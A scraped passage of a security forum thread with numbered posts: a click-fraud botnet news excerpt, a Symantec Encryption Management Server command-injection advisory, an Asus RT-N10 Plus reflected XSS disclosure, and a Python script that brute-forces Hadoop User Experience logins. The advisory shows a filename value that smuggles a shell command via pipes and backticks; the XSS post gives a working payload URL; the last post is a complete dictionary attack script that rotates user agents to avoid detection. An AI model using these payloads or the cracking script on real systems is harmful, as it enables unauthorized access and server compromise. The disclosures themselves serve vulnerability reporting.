of total infections. India is the runner-up with 7,446 hosts, or 13.5 percent of total infections, and the U.S. came in fifth with 2,540 hosts, or 4.6 percent of total infections. “There are a variety of ways that a criminal will infect systems with malware,” Williams said. “A common method right now is through the use of an exploit kit, embedded in a hidden frame on a webpage. In some cases, these malicious frames are part of a malicious advertising campaign and delivered through the same advertising networks which they are intending to defraud.” Threat actors typically benefit from click fraud through the cost per click model of online advertising, Williams said. 
He explained that “the miscreant will leverage software – often in the form of a bot – to click through advertisements repeatedly in order to either generate revenue in a [cost per click] model or to exhaust the advertising budget of a rival.” Click fraud often involves the use of a botnet so that clicks on advertisements are not seen coming from the same computer, Williams said. He explained that clicking from the same computer would trigger anti-fraud measures and that the clicks would be removed from the payout calculations, whereas using a botnet helps fraudsters remain undetected. “The losers in a click fraud scenario from a monetary perspective are the advertisers,” Williams said. “They have invested money to have their advertisements viewed by people who may be interested in their product or service. They pay a finite amount which, when the [cost per click or cost per mille] limit is reached for that campaign, their ads are no longer displayed.” Source
  22. Vantage Point Security Advisory 2014-007 ======================================== Title: Symantec Encryption Management Server - Remote Command Injection ID: VP-2014-007 Vendor: Symantec Affected Product: Symantec Encryption Gateway Affected Versions: < 3.2.0 MP6 Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ Author: Paul Craig <paul[at]vantagepoint[dot]sg> Summary: --------- Symantec Gateway Email Encryption provides centrally managed email encryption to secure email communications with customers and partners regardless of whether or not recipients have their own email encryption software. With Gateway Email Encryption, organizations can minimize the risk of a data breach while complying with regulatory mandates for information security and privacy. Details: --------- Remote Command Injection vulnerabilities occur when user-supplied input is used directly as a command line argument to a fork(), execv() or a CreateProcessA() function. It was found that the binary /usr/bin/pgpsysconf calls the binary /usr/bin/pgpbackup with unfiltered user-supplied input when restoring a Database Backup from the Symantec Encryption Management Web Interface. The user-supplied 'filename' value is used directly as a command argument, and can be concatenated to include additional commands with the use of the pipe character. This can allow a lower-privileged Administrator to compromise the Encryption Management Server. This is demonstrated below in a snippet from pgpsysconf: .text:08058FEA mov dword ptr [ebx], offset aUsrBinPgpbacku ; "/usr/bin/pgpbackup" .text:08058FF0 cmp [ebp+var_1D], 0 .text:08058FF4 jnz short loc_8059049 .text:08058FF6 mov ecx, 4 .text:08058FFB mov edx, 8 .text:08059000 mov eax, 0Ch .text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50 .text:0805900C mov [ebx+edx], esi .text:0805900F mov dword ptr [ebx+eax], 0 .text:08059016 call _fork ; Bingo.. An example to exploit this vulnerability and run the ping command can be seen below. 
POST /omc/uploadBackup.event .... .... Content-Disposition: form-data; name="file"; filename="test123|`ping`|-whatever.tar.gz.pgp" This vulnerability can be further exploited to gain local root access by calling the setuid binary pgpsysconf to install a local package file. Fix Information: --------- Upgrade to Symantec Encryption Management Server 3.3.2 MP7. See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00 for more information Timeline: --------- 2014/11/26: Issue Reported. 2015/01/30: Patch Released. About Vantage Point Security: --------- Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ Contact: office[at]vantagepoint[dot]sg Source
  23. ##################################### Title:- Reflected XSS vulnerability in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: Medium Auth: Required # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: Asus Router RT-N10 Plus with firmware 2.1.1.70 is vulnerable to a cross-site scripting attack; this may lead to a wider network compromise. #Technical Details: The value of the flag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d was submitted in the flag parameter. This input was echoed unmodified in the application's response. #Steps to Reproduce: (POC): After setting up the router, enter this URL 1.http://ip-of-router/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+Apply+&preferred_lang=&flag=initial78846%27%3balert(1337)%2f%2f372137b5d 2. This will ask for credentials; once the credentials are entered, the XSS will trigger successfully. # Disclosure: 8-jan-2015 Reported to ASUS 9-jan-2015 ASUS confirms that they reported it to the concerned department 15-jan-2015 Ask for update from ASUS; ASUS says reported to HQ 28-jan-2015 Ask ASUS about reporting to SecurityFocus; no reply from ASUS 29-jan-2015 SecurityFocus bugtraq #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source
  24. felicitari, apropo faci colectie de tricouri!
  25. Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source